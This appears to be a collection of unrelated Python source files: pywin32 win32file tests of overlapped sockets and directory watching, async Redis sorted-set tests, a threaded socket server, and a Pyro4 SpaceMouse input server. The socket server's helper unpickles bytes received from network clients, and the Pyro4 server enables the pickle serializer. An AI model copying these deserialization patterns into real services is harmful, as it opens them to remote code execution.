self.testCompletionPortsNonQueued(True)
def testHashable(self):
overlapped = pywintypes.OVERLAPPED()
d = {}
d[overlapped] = "hello"
self.failUnlessEqual(d[overlapped], "hello")
def testComparable(self):
overlapped = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped, overlapped)
# ensure we explicitly test the operators.
self.failUnless(overlapped == overlapped)
self.failIf(overlapped != overlapped)
def testComparable2(self):
# 2 overlapped objects compare equal if their contents are the same.
overlapped1 = pywintypes.OVERLAPPED()
overlapped2 = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failUnless(overlapped1 == overlapped2)
self.failIf(overlapped1 != overlapped2)
# now change something in one of them - should no longer be equal.
overlapped1.hEvent = 1
self.failIfEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failIf(overlapped1 == overlapped2)
self.failUnless(overlapped1 != overlapped2)
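# A minimal sketch (hypothetical helper, not part of the original test file) of
# the queued completion-port round trip that testCompletionPortsQueued
# exercises above: post a packet carrying a Python object to an IOCP and read
# the same (errCode, nbytes, key, overlapped) tuple back out.
def _iocp_round_trip_sketch():
    port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
    ol = pywintypes.OVERLAPPED()
    ol.object = "payload"    # any Python object can ride along on the OVERLAPPED
    win32file.PostQueuedCompletionStatus(port, 0, 42, ol)
    errCode, nbytes, key, ol2 = win32file.GetQueuedCompletionStatus(
        port, win32event.INFINITE)
    assert errCode == 0 and key == 42 and ol2.object == "payload"
    return ol2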
class TestSocketExtensions(unittest.TestCase):
def acceptWorker(self, port, running_event, stopped_event):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('', port))
listener.listen(200)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
# We used to allow strings etc to be passed here, and they would be
# modified! Obviously this is evil :)
buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED.
self.assertRaises(TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped)
# This is the correct way to allocate the buffer...
buffer = win32file.AllocateReadBuffer(1024)
rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
# Set the event to say we are all ready
running_event.set()
# and wait for the connection.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
#fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
accepter.send(buffer[:nbytes])
# NOT set in a finally - this means *successfully* stopped!
stopped_event.set()
def testAcceptEx(self):
port = 4680
running = threading.Event()
stopped = threading.Event()
t = threading.Thread(target=self.acceptWorker, args=(port, running,stopped))
t.start()
running.wait(2)
if not running.isSet():
self.fail("AcceptEx Worker thread failed to start")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
win32file.WSASend(s, str2bytes("hello"), None)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# Like above - WSARecv used to allow strings as the receive buffer!!
buffer = " " * 10
self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
# This one should work :)
buffer = win32file.AllocateReadBuffer(10)
win32file.WSARecv(s, buffer, overlapped)
nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("hello"))
# thread should have stopped
stopped.wait(2)
if not stopped.isSet():
self.fail("AcceptEx Worker thread failed to successfully stop")
class TestFindFiles(unittest.TestCase):
def testIter(self):
dir = os.path.join(os.getcwd(), "*")
files = win32file.FindFilesW(dir)
set1 = set()
set1.update(files)
set2 = set()
for file in win32file.FindFilesIterator(dir):
set2.add(file)
assert len(set2) > 5, "This directory has less than 5 files!?"
self.failUnlessEqual(set1, set2)
def testBadDir(self):
dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)
def testEmptySpec(self):
spec = os.path.join(os.getcwd(), "*.foo_bar")
num = 0
for i in win32file.FindFilesIterator(spec):
num += 1
self.failUnlessEqual(0, num)
def testEmptyDir(self):
test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
try:
# Note: previously used shutil.rmtree, but when looking for
# reference count leaks, that function showed leaks! os.rmdir
# doesn't have that problem.
os.rmdir(test_path)
except os.error:
pass
os.mkdir(test_path)
try:
num = 0
for i in win32file.FindFilesIterator(os.path.join(test_path, "*")):
num += 1
# Expecting "." and ".." only
self.failUnlessEqual(2, num)
finally:
os.rmdir(test_path)
class TestDirectoryChanges(unittest.TestCase):
num_test_dirs = 1
def setUp(self):
self.watcher_threads = []
self.watcher_thread_changes = []
self.dir_names = []
self.dir_handles = []
for i in range(self.num_test_dirs):
td = tempfile.mktemp("-test-directory-changes-%d" % i)
os.mkdir(td)
self.dir_names.append(td)
hdir = win32file.CreateFile(td,
ntsecuritycon.FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ,
None, # security desc
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS |
win32con.FILE_FLAG_OVERLAPPED,
None)
self.dir_handles.append(hdir)
changes = []
t = threading.Thread(target=self._watcherThreadOverlapped,
args=(td, hdir, changes))
t.start()
self.watcher_threads.append(t)
self.watcher_thread_changes.append(changes)
def _watcherThread(self, dn, dh, changes):
# A synchronous version:
# XXX - not used - I was having a whole lot of problems trying to
# get this to work. Specifically:
# * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely.
# * If another thread attempts to close the handle while
# ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method
# blocks (which has nothing to do with the GIL - it is correctly
# managed)
# Which ends up with no way to kill the thread!
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
while 1:
try:
print "waiting", dh
changes = win32file.ReadDirectoryChangesW(dh,
8192,
False, #sub-tree
flags)
print "got", changes
except:
raise
changes.extend(changes)
def _watcherThreadOverlapped(self, dn, dh, changes):
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
buf = win32file.AllocateReadBuffer(8192)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
while 1:
win32file.ReadDirectoryChangesW(dh,
buf,
False, #sub-tree
flags,
overlapped)
# Wait for our event, or for 5 seconds.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000)
if rc == win32event.WAIT_OBJECT_0:
# got some data! Must use GetOverlappedResult to find out
# how much is valid! 0 generally means the handle has
# been closed. Blocking is OK here, as the event has
# already been set.
nbytes = win32file.GetOverlappedResult(dh, overlapped, True)
if nbytes:
bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes)
changes.extend(bits)
else:
# This is "normal" exit - our 'tearDown' closes the
# handle.
# print "looks like dir handle was closed!"
return
else:
print "ERROR: Watcher thread timed-out!"
return # kill the thread!
def tearDown(self):
# be careful about raising errors at teardown!
for h in self.dir_handles:
# See comments in _watcherThread above - this appears to
# deadlock if a synchronous ReadDirectoryChangesW is waiting...
# (No such problems with an asynch ReadDirectoryChangesW)
h.Close()
for dn in self.dir_names:
try:
shutil.rmtree(dn)
except OSError:
print "FAILED to remove directory", dn
for t in self.watcher_threads:
# closing dir handle should have killed threads!
t.join(5)
if t.isAlive():
print "FAILED to wait for thread termination"
def stablize(self):
time.sleep(0.5)
def testSimple(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "test_file")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "test_file")])
def testSmall(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "x")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "x")])
class TestEncrypt(unittest.TestCase):
def testEncrypt(self):
fname = tempfile.mktemp("win32file_test")
f = open(fname, "wb")
f.write(str2bytes("hello"))
f.close()
f = None
try:
try:
win32file.EncryptFile(fname)
except win32file.error, details:
if details.winerror != winerror.ERROR_ACCESS_DENIED:
raise
print "It appears this is not NTFS - cant encrypt/decrypt"
win32file.DecryptFile(fname)
finally:
if f is not None:
f.close()
os.unlink(fname)
class TestConnect(unittest.TestCase):
def connect_thread_runner(self, expect_payload, giveup_event):
# As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking
# accept, as our test connection may never come. May as well use
# AcceptEx for this...
listener = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
listener.bind(self.addr)
listener.listen(1)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
if expect_payload:
buf_size = 1024
else:
# when we don't expect data we must be careful to only pass the
# exact number of bytes for the endpoint data...
buf_size = win32file.CalculateSocketEndPointSize(listener)
buffer = win32file.AllocateReadBuffer(buf_size)
win32file.AcceptEx(listener, accepter, buffer, overlapped)
# wait for the connection or our test to fail.
events = giveup_event, overlapped.hEvent
rc = win32event.WaitForMultipleObjects(events, False, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
if rc == win32event.WAIT_OBJECT_0:
# Our main thread running the test failed and will never connect.
return
# must be a connection.
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
if expect_payload:
self.request = buffer[:nbytes]
accepter.send(str2bytes('some expected response'))
def test_connect_with_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(True, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request"))
except win32file.error, exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
            raise  # some error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
self.assertEqual(self.request, str2bytes('some expected request'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
def test_connect_without_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(False, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol)
except win32file.error, exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
            raise  # some error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
class TestTransmit(unittest.TestCase):
def test_transmit(self):
import binascii
try:
bytes = os.urandom(1024*1024)
except AttributeError:
# must be py2.3...
bytes = ''.join([chr(random.randint(0,255)) for _ in range(5)])
val = binascii.hexlify(bytes)
val_length = len(val)
f = tempfile.TemporaryFile()
f.write(val)
def runner():
s1 = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
s1.bind(self.addr)
s1.listen(1)
cli, addr = s1.accept()
buf = 1
self.request = []
while buf:
buf = cli.recv(1024*100)
self.request.append(buf)
th = threading.Thread(target=runner)
th.start()
time.sleep(0.5)
s2 = socket.socket()
s2.connect(self.addr)
length = 0
aaa = str2bytes("[AAA]")
bbb = str2bytes("[BBB]")
ccc = str2bytes("[CCC]")
ddd = str2bytes("[DDD]")
empty = str2bytes("")
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
s2.close()
th.join()
buf = str2bytes('').join(self.request)
self.assertEqual(length, len(buf))
expected = val + aaa + val + bbb + val + val + ccc + ddd + val
self.assertEqual(type(expected), type(buf))
self.assert_(expected == buf)
class TestWSAEnumNetworkEvents(unittest.TestCase):
def test_basics(self):
s = socket.socket()
e = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(s, e, 0)
self.assertEquals(win32file.WSAEnumNetworkEvents(s), {})
self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {})
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam")
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam")
f = open("NUL")
h = win32file._get_osfhandle(f.fileno())
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h)
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h)
try:
win32file.WSAEnumNetworkEvents(h)
except win32file.error, e:
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
try:
win32file.WSAEnumNetworkEvents(s, h)
except win32file.error, e:
# According to the docs it would seem reasonable that
# this would fail with WSAEINVAL, but it doesn't.
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
def test_functional(self):
# This is not really a unit test, but it does exercise the code
# quite well and can serve as an example of WSAEventSelect and
# WSAEnumNetworkEvents usage.
port = socket.socket()
port.setblocking(0)
port_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(port, port_event,
win32file.FD_ACCEPT |
win32file.FD_CLOSE)
port.bind(("127.0.0.1", 0))
port.listen(10)
client = socket.socket()
client.setblocking(0)
client_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(client, client_event,
win32file.FD_CONNECT |
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
err = client.connect_ex(port.getsockname())
self.assertEquals(err, win32file.WSAEWOULDBLOCK)
res = win32event.WaitForSingleObject(port_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(port, port_event)
self.assertEquals(events, {win32file.FD_ACCEPT: 0})
server, addr = port.accept()
server.setblocking(0)
server_event = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(server, server_event,
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CONNECT: 0,
win32file.FD_WRITE: 0})
sent = 0
data = str2bytes("x") * 16 * 1024
while sent < 16 * 1024 * 1024:
try:
sent += client.send(data)
except socket.error, e:
if e.args[0] == win32file.WSAEINTR:
continue
elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS):
break
else:
raise
else:
self.fail("could not find socket buffer limit")
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_READ: 0})
received = 0
while received < sent:
try:
received += len(server.recv(16 * 1024))
except socket.error, e:
if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]:
continue
else:
raise
self.assertEquals(received, sent)
events = win32file.WSAEnumNetworkEvents(server)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
client.shutdown(socket.SHUT_WR)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
# strange timing issues...
for i in range(5):
events = win32file.WSAEnumNetworkEvents(server, server_event)
if events: break
win32api.Sleep(100)
else:
raise AssertionError("failed to get events")
self.assertEquals(events, {win32file.FD_CLOSE: 0})
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
server.close()
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CLOSE: 0})
client.close()
events = win32file.WSAEnumNetworkEvents(port)
self.assertEquals(events, {})
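# Hedged sketch (not part of the original test suite): the bare overlapped-read
# pattern the tests above exercise repeatedly - allocate a read buffer, issue the
# call with an OVERLAPPED carrying an event, wait on the event, then ask
# GetOverlappedResult how many bytes are actually valid. "handle" is assumed to be
# any file or pipe handle opened with FILE_FLAG_OVERLAPPED.
def _example_overlapped_read(handle, nbytes=4096):
    buf = win32file.AllocateReadBuffer(nbytes)
    ol = pywintypes.OVERLAPPED()
    ol.hEvent = win32event.CreateEvent(None, 0, 0, None)
    win32file.ReadFile(handle, buf, ol)  # returns immediately; completion is signalled on hEvent
    win32event.WaitForSingleObject(ol.hEvent, win32event.INFINITE)
    nread = win32file.GetOverlappedResult(handle, ol, True)
    return buf[:nread]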
if __name__ == '__main__':
testmain()
|
test_sortedset.py
|
from purse.collections import RedisSortedSet
from pydantic import BaseModel
import pytest
import aioredis
import asyncio
from threading import Thread
class Context:
def __init__(self):
self.rc = aioredis.Redis(db=5)
self.loop = asyncio.new_event_loop()
def _loop_thread_target():
self.loop.run_forever()
self.loop.close()
self._loop_thread = Thread(target=_loop_thread_target, daemon=True)
self._loop_thread.start()
def run(self, coro) -> asyncio.Future:
return asyncio.run_coroutine_threadsafe(coro, self.loop)
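# Hedged sketch (an assumption, not part of the original tests): how the Context
# above is meant to be driven from synchronous code - submit a coroutine to the
# background event loop and block on the returned concurrent.futures.Future.
# `_example_wait_ms` is a made-up coroutine used purely for illustration.
async def _example_wait_ms(ms):
    await asyncio.sleep(ms / 1000)
    return ms

def _example_context_usage():
    ctx = Context()
    # .result() blocks the calling thread until the coroutine finishes in the loop thread
    return ctx.run(_example_wait_ms(10)).result()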
@pytest.fixture(scope="session")
def ctx() -> Context:
ctx = Context()
yield ctx
def test_basics(ctx):
plants = {
'lettuce': 3,
'carrots': 4,
'apples': 5,
'bananas': 7,
'tomatoes': 8,
'spinach': 9,
'broccoli': 12,
}
key = 'trash:basic'
rss = RedisSortedSet(ctx.rc, key, str)
async def main():
await rss.clear()
assert await rss.len() == 0
await rss.add([(k, v) for k, v in plants.items()])
assert await rss.len() == 7
async for k, v in rss.values():
assert k in plants and plants[k] == v
k, v = (await rss.pop_max())[0]
assert k == 'broccoli' and v == 12
k, v = (await rss.pop_min())[0]
assert k == 'lettuce' and v == 3
assert await rss.len() == 5
await rss.clear()
return 0
num = ctx.run(main()).result()
assert num == 0
def test_non_uniques(ctx):
plants = {
'lettuce': 3,
'carrots': 4,
'apples': 5,
'bananas': 7,
'tomatoes': 8,
        'bananas': 10,  # duplicate key: the dict literal keeps this last value, so 'bananas' scores 10
'spinach': 9,
'broccoli': 12,
}
key = 'trash:basic'
rss = RedisSortedSet(ctx.rc, key, str)
async def main():
await rss.clear()
assert await rss.len() == 0
await rss.add([(k, v) for k, v in plants.items()])
assert await rss.len() == 7
async for k, v in rss.values():
assert k in plants and plants[k] == v
k, v = (await rss.pop_max())[0]
assert k == 'broccoli' and v == 12
k, v = (await rss.pop_min())[0]
assert k == 'lettuce' and v == 3
assert await rss.len() == 5
await rss.clear()
return 0
num = ctx.run(main()).result()
assert num == 0
def test_models(ctx):
class Plant(BaseModel):
name: str
nutrition: float
tasty: bool = False
plants = [
Plant(name="apples", nutrition=5, tasty=True),
Plant(name="bananas", nutrition=3, tasty=True),
Plant(name="spinach", nutrition=9, tasty=False),
Plant(name="tomatoes", nutrition=8, tasty=False),
Plant(name="carrots", nutrition=7, tasty=False),
Plant(name="broccoli", nutrition=12, tasty=True),
Plant(name="lettuce", nutrition=4, tasty=False),
Plant(name="mangoes", nutrition=6, tasty=True)
]
key = "trash:models"
rss = RedisSortedSet(ctx.rc, key, Plant)
async def main():
await rss.clear()
assert await rss.len() == 0
await rss.add([(p, p.nutrition) for p in plants])
assert await rss.len() == len(plants)
p: Plant
p, s = (await rss.pop_max())[0]
assert p.name == "broccoli" and s == p.nutrition
assert await rss.len() == len(plants) - 1
mins = await rss.pop_min(count=2)
p, s = mins[0]
assert p.name == "bananas" and s == p.nutrition
p, s = mins[1]
assert p.name == "lettuce" and s == p.nutrition
assert await rss.len() == len(plants) - 3
p, s = await rss.peak_max()
assert p.name == 'spinach' and s == p.nutrition
await rss.increment((p, 10))
p, s = await rss.peak_max()
assert p.name == 'spinach' and s == (p.nutrition + 10)
ctx.run(main()).result()
def test_models_slices(ctx):
class Plant(BaseModel):
name: str
nutrition: float
tasty: bool = False
def __hash__(self):
return hash(self.json())
plants = [
Plant(name="apples", nutrition=5, tasty=True),
Plant(name="bananas", nutrition=3, tasty=True),
Plant(name="spinach", nutrition=9, tasty=False),
Plant(name="tomatoes", nutrition=8, tasty=False),
Plant(name="carrots", nutrition=7, tasty=False),
Plant(name="lettuce", nutrition=4, tasty=False),
Plant(name="mangoes", nutrition=6, tasty=True)
]
key = "trash:models"
rss = RedisSortedSet(ctx.rc, key, Plant)
async def main():
await rss.clear()
await rss.add([(p, p.nutrition) for p in plants])
res = await rss.slice_by_score(min_score=7, max_score=20, descending=True)
for p, k in zip([r[0] for r in res], ['spinach', 'tomatoes', 'carrots']):
assert p.name == k
res = await rss.slice_by_score(min_score=7, max_score=20, descending=False)
for p, k in zip([r[0] for r in res], ['carrots', 'tomatoes', 'spinach']):
assert p.name == k
res = await rss.slice_by_rank(min_rank=0, max_rank=1, descending=True) # top 2
assert len(res) == 2
for p, k in zip([r[0] for r in res], ['spinach', 'tomatoes']):
assert p.name == k
res = await rss.slice_by_rank(min_rank=0, max_rank=1, descending=False) # bottom 2
assert len(res) == 2
for p, k in zip([r[0] for r in res], ['bananas', 'lettuce']):
assert p.name == k
    ctx.run(main()).result()  # block until the coroutine (and its asserts) have completed
|
server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from logging.handlers import RotatingFileHandler
import pickle
import socket
import threading
class ThreadedServer(object):
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(target = self.listenToClient,args = (client,address)).start()
def listenToClient(self, client, address):
size = 1024
global logger
while True:
try:
data = client.recv(size)
if data:
#Received data
logger.debug("Received data from client")
else:
                    logger.error("Client disconnected")
                    raise ConnectionError("Client disconnected")
            except Exception:
                client.close()
                return False
def unpickle_data(tdata):
"""
Unpickle the data from the client
>>> unpickle_data(b'\x80\x03X\n\x00\x00\x00Easy testsq\x00.')
"Easy tests"
>>> unpickle_data("Easy tests")
"Easy tests"
"""
try:
if isinstance(tdata, bytes): #Quick check if tdata is already bytes
data = pickle.loads(tdata)
else:
data = tdata
except:
data = False
return data
def pickle_data(tdata):
"""
Pickle the data for the client
>>> pickle_data(b'\x80\x03X\n\x00\x00\x00Easy testsq\x00.')
b'\x80\x03X\n\x00\x00\x00Easy testsq\x00.'
>>> pickle_data("Easy tests")
b'\x80\x03X\n\x00\x00\x00Easy testsq\x00.'
"""
try:
if isinstance(tdata, bytes): #Quick check if tdata is already bytes
data = tdata
else:
data = pickle.dumps(tdata)
except:
data = False
return data
###Starting the logger###
try:
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
formatter = logging.Formatter('%(asctime)s :: %(levelname)s :: %(message)s')
file_handler = RotatingFileHandler('activity.log', 'a', 1000000, 1)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
except Exception:
    print("!!! Failed to launch logger !!!")
    print("!!! Immediate shutdown !!!")
    raise SystemExit(1)
###End of logger starting###
logger.info("Server starting...")
|
input_server.py
|
# first to start the nameserver start: python -m Pyro4.naming
import Pyro4
from threading import Thread
import time
import numpy as np
from rlkit.launchers import conf as config
Pyro4.config.SERIALIZERS_ACCEPTED = set(['pickle','json', 'marshal', 'serpent'])
Pyro4.config.SERIALIZER='pickle'
device_state = None
@Pyro4.expose
class DeviceState(object):
state = None
def get_state(self):
return device_state
def set_state(self, state):
global device_state
device_state = state
class SpaceMouseExpert:
def __init__(
self,
xyz_dims=3,
xyz_remap=[0, 1, 2],
xyz_scale=[1, 1, 1],
xyz_abs_threshold=0.0,
rot_dims=3,
rot_remap=[0, 1, 2],
rot_scale=[1, 1, 1],
rot_abs_threshold=0.0,
rot_discrete=False,
min_clip=-np.inf,
max_clip=np.inf
):
"""TODO: fill in other params"""
self.xyz_dims = xyz_dims
self.xyz_remap = np.array(xyz_remap)
self.xyz_scale = np.array(xyz_scale)
self.xyz_abs_threshold = xyz_abs_threshold
self.rot_dims = rot_dims
self.rot_remap = rot_remap
self.rot_scale = rot_scale
self.rot_abs_threshold = rot_abs_threshold
self.rot_discrete = rot_discrete
self.min_clip = min_clip
self.max_clip = max_clip
self.thread = Thread(target = start_server)
self.thread.daemon = True
self.thread.start()
self.device_state = DeviceState()
def get_action(self, obs):
"""Must return (action, valid, reset, accept)"""
state = self.device_state.get_state()
# time.sleep(0.1)
if state is None:
return None, False, False, False
dpos, rotation, roll, pitch, yaw, accept, reset = (
state["dpos"],
state["rotation"],
state["roll"],
state["pitch"],
state["yaw"],
state["grasp"], #["left_click"],
state["reset"], #["right_click"],
)
xyz = dpos[self.xyz_remap]
xyz[np.abs(xyz) < self.xyz_abs_threshold] = 0.0
xyz = xyz * self.xyz_scale
xyz = np.clip(xyz, self.min_clip, self.max_clip)
rot = np.array([roll, pitch, yaw])
rot[np.abs(rot) < self.rot_abs_threshold] = 0.0
if self.rot_discrete:
max_i = np.argmax(np.abs(rot))
for i in range(len(rot)):
if i != max_i:
rot[i] = 0.0
rot = rot * self.rot_scale
rot = np.clip(rot, self.min_clip, self.max_clip)
a = np.concatenate([xyz[:self.xyz_dims], rot[:self.rot_dims]])
valid = not np.all(np.isclose(a, 0))
# print(a, roll, pitch, yaw, valid)
return (a, valid, reset, accept)
def start_server():
daemon = Pyro4.Daemon(config.SPACEMOUSE_HOSTNAME)
ns = Pyro4.locateNS() # find the name server
    uri = daemon.register(DeviceState)    # register the DeviceState class as a Pyro object
    ns.register("example.greeting", uri)  # publish it under this name in the name server
print("uri:", uri)
print("Server ready.")
daemon.requestLoop() # start the event loop of the server to wait for calls
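# Hedged sketch (an assumption, not part of the original file): what a remote
# producer process might do - look up the name registered above and push a state
# dict with the fields that SpaceMouseExpert.get_action() reads. All values below
# are placeholders.
def _example_remote_publisher():
    remote_state = Pyro4.Proxy("PYRONAME:example.greeting")
    remote_state.set_state({
        "dpos": np.zeros(3),          # translation, indexed via xyz_remap
        "rotation": np.eye(3),
        "roll": 0.0, "pitch": 0.0, "yaw": 0.0,
        "grasp": False,               # surfaced as `accept`
        "reset": False,
    })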
if __name__ == "__main__":
expert = SpaceMouseExpert()
for i in range(100):
time.sleep(1)
print(expert.get_action(None))
|
AbstractBaseThread.py
|
import os
import socket
import sys
import tempfile
from queue import Queue, Empty
from subprocess import Popen, PIPE
from threading import Thread
import time
import zmq
from PyQt5.QtCore import QThread, pyqtSignal
from urh import constants
from urh.util.Logger import logger
ON_POSIX = 'posix' in sys.builtin_module_names
class AbstractBaseThread(QThread):
started = pyqtSignal()
stopped = pyqtSignal()
sender_needs_restart = pyqtSignal()
def __init__(self, sample_rate, freq, gain, bandwidth, receiving: bool,
ip='127.0.0.1', parent=None):
super().__init__(parent)
self.ip = ip
self.port = 1337
self._sample_rate = sample_rate
self._freq = freq
self._gain = gain
